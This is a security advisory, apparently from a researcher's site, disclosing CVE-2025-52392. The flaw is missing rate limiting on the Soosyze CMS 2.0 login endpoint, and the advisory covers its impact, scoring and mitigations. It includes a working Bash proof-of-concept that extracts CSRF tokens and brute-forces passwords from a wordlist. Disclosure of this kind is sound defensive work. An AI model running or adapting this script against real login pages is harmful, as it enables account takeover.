Brute Force Login Vulnerability in Soosyze CMS 2.0 (CVE-2025-52392)

Author: Beatriz Fresno Naumova (beafn28)

Date: 13/08/2025

Vendor: Soosyze

Product: Soosyze CMS

Version Affected: 2.0 (confirmed)

Component: /user/login – Authentication Controller

CWE: CWE-307: Improper Restriction of Excessive Authentication Attempts

Attack Vector: Remote (network exploitable)

Description

Soosyze CMS 2.0 contains a vulnerability in the /user/login authentication endpoint that allows unlimited credential-guessing attempts due to the absence of rate limiting and account lockout mechanisms.

A remote, unauthenticated attacker can submit unlimited HTTP POST requests with varying passwords for a known username/email without triggering any throttling, delay, or lockout.

The vulnerability can be exploited using automated tools such as THC Hydra, Burp Suite Intruder, or custom scripts, enabling brute-force attacks that may lead to compromise of administrative accounts.

Testing confirmed that the server issues a valid login form and CSRF token on every request, and accepts repeated authentication attempts without introducing timing penalties or invalidating sessions.

No vendor patch or mitigation was available at the time of publication.

Impact

Successful exploitation may allow:

Account Compromise: Unauthorized access to valid user accounts.
Administrative Takeover: Full compromise of the CMS instance if administrative credentials are obtained.
Data Exposure/Modification: Unrestricted access to protected content and potential injection of malicious configurations or content.

Attack Details

Attack Vector (AV): Network (N)

Attack Complexity (AC): Low (L)

Privileges Required (PR): None (N)

User Interaction (UI): Required (R)

Scope (S): Unchanged (U)

Confidentiality (C): Low (L)

Integrity (I): Low (L)

Availability (A): None (N)

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

CVSS v3.1 Base Score: 5.4 (Medium)

Proof of Concept (PoC)

Overview

The following PoC demonstrates a brute-force authentication vulnerability in Soosyze CMS 2.0 at the /user/login endpoint. The issue is caused by missing rate limiting and account lockout mechanisms, allowing an attacker to try unlimited password guesses.

Steps to Reproduce

Deploy or access a Soosyze CMS 2.0 instance.
Identify a valid username or email address (e.g., test@test.com).
Prepare a password dictionary (e.g., rockyou.txt).
Execute the provided Bash PoC script to perform automated POST login attempts.

PoC Script

#!/usr/bin/env bash
# Author: Beatriz Fresno Naumova (beafn28)
# Usage:
#   ./script.sh [wordlist.txt]
# If no wordlist is provided, a dictionary will be used.

set -euo pipefail

BASE_URL="http://localhost:8000"
LOGIN_PATH="/user/login"
EMAIL_FIELD="email"
PASS_FIELD="password"
TARGET_EMAIL="test@test.com"

WORDLIST_FILE="${1:-}"
DEFAULT_WORDS=("123456" "admin" "password" "qwerty" "letmein" "admin123" "password1")

form_url="$BASE_URL$LOGIN_PATH"
COOKIE_JAR="$(mktemp)"

get_form() {
    curl -sS -c "$COOKIE_JAR" -b "$COOKIE_JAR" "$form_url" > /tmp/login_page.html
}

extract_token() {
    local name value
    name=$(sed -nE 's/.*name="([_a-zA-Z0-9:-]*(token|csrf)[_a-zA-Z0-9:-]*)".*type="hidden".*/\1/p' /tmp/login_page.html | head -n1 || true)
    value=""
    if [[ -n "$name" ]]; then
        value=$(sed -nE "s/.*name=\"$name\".*value=\"([^\"]*)\".*/\1/p" /tmp/login_page.html | head -n1 || true)
    fi
    printf '%s\t%s\n' "$name" "$value"
}

post_login() {
    local pass="$1" tname="$2" tval="$3"
    curl -sS -o /tmp/resp.html -w "%{http_code}" \
        -c "$COOKIE_JAR" -b "$COOKIE_JAR" \
        -X POST "$form_url" \
        -H "Content-Type: application/x-www-form-urlencoded" \
        -H "Origin: $BASE_URL" -H "Referer: $form_url" \
        --data-urlencode "$EMAIL_FIELD=$TARGET_EMAIL" \
        --data-urlencode "$PASS_FIELD=$pass" \
        $( [[ -n "$tname" && -n "$tval" ]] && printf -- '--data-urlencode %s=%s' "$tname" "$tval" )
}

echo "[*] Starting brute-force attack on $form_url"
[[ -n "$WORDLIST_FILE" && -r "$WORDLIST_FILE" ]] && mapfile -t words < "$WORDLIST_FILE" || words=("${DEFAULT_WORDS[@]}")

i=0
for pw in "${words[@]}"; do
    i=$((i+1))
    get_form
    IFS=$'\t' read -r TOKEN_NAME TOKEN_VALUE < <(extract_token)
    code=$(post_login "$pw" "$TOKEN_NAME" "$TOKEN_VALUE")

    if grep -q '"redirect"' /tmp/resp.html; then
        echo -e "[$i] Password found: '\e[1m$pw\e[0m' (HTTP $code)"
        break
    else
        echo "[$i] '$pw' (HTTP $code)"
    fi

    sleep 0.$((RANDOM%9+1))
done

rm -f "$COOKIE_JAR" /tmp/resp.html

Execution example

./poc.sh rockyou.txt

Mitigation

Implement server-side rate limiting (e.g., maximum 5 failed attempts per minute per IP).
Apply temporary account lockout after multiple failed attempts.
Introduce CAPTCHA or other bot-mitigation mechanisms after repeated failed logins.
Consider logging and monitoring repeated failed authentication attempts.

Discoverer

Beatriz Fresno Naumova (beafn28)

References

CVE: CVE-2025-52392
NIST: https://nvd.nist.gov/vuln/detail/CVE-2025-52392
Public advisory: https://beafn28.gitbook.io/beafn28/cve/brute-force-login-vulnerability-in-soosyze-cms-2.0-cve-2025-52392

PreviousIntroduction Gathering - Web Edition

Last updated 1 day ago

Was this helpful?